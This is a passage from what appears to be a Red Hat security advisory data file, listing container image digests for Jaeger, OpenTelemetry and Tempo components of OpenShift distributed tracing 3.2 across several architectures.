"8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95_arm64" }, "product_reference": "rhosdt/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597_amd64" }, "product_reference": "rhosdt/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195_ppc64le" }, "product_reference": "rhosdt/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f_amd64" }, "product_reference": "rhosdt/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c_arm64" }, "product_reference": "rhosdt/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0_s390x" }, "product_reference": "rhosdt/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76_amd64" }, "product_reference": "rhosdt/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917_ppc64le" }, "product_reference": "rhosdt/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7_s390x" }, "product_reference": "rhosdt/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7_arm64" }, "product_reference": "rhosdt/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead_ppc64le" }, "product_reference": "rhosdt/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969_s390x" }, "product_reference": "rhosdt/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19_amd64" }, "product_reference": "rhosdt/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6_arm64" }, "product_reference": "rhosdt/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844_arm64" }, "product_reference": "rhosdt/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202_ppc64le" }, "product_reference": "rhosdt/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e_amd64" }, "product_reference": "rhosdt/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e_s390x" }, "product_reference": "rhosdt/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x" }, "product_reference": "rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64" }, "product_reference": "rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64" }, "product_reference": "rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le" }, "product_reference": "rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869_amd64" }, "product_reference": "rhosdt/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9_ppc64le" }, "product_reference": "rhosdt/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3_s390x" }, "product_reference": "rhosdt/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb_arm64" }, "product_reference": "rhosdt/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4_ppc64le" }, "product_reference": "rhosdt/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0_amd64" }, "product_reference": "rhosdt/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23_arm64" }, "product_reference": "rhosdt/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328_s390x" }, "product_reference": "rhosdt/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd_ppc64le" }, "product_reference": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625_s390x" }, "product_reference": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de_arm64" }, "product_reference": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb_amd64" }, "product_reference": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f_ppc64le" }, "product_reference": "rhosdt/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0_s390x" }, "product_reference": "rhosdt/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0_amd64" }, "product_reference": "rhosdt/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2_arm64" }, "product_reference": "rhosdt/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653_arm64" }, "product_reference": "rhosdt/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a_s390x" }, "product_reference": "rhosdt/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf_ppc64le" }, "product_reference": "rhosdt/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394_amd64" }, "product_reference": "rhosdt/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c_s390x" }, "product_reference": "rhosdt/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7_ppc64le" }, "product_reference": "rhosdt/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb_amd64" }, "product_reference": "rhosdt/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3_arm64" }, "product_reference": "rhosdt/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5_s390x" }, "product_reference": "rhosdt/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": 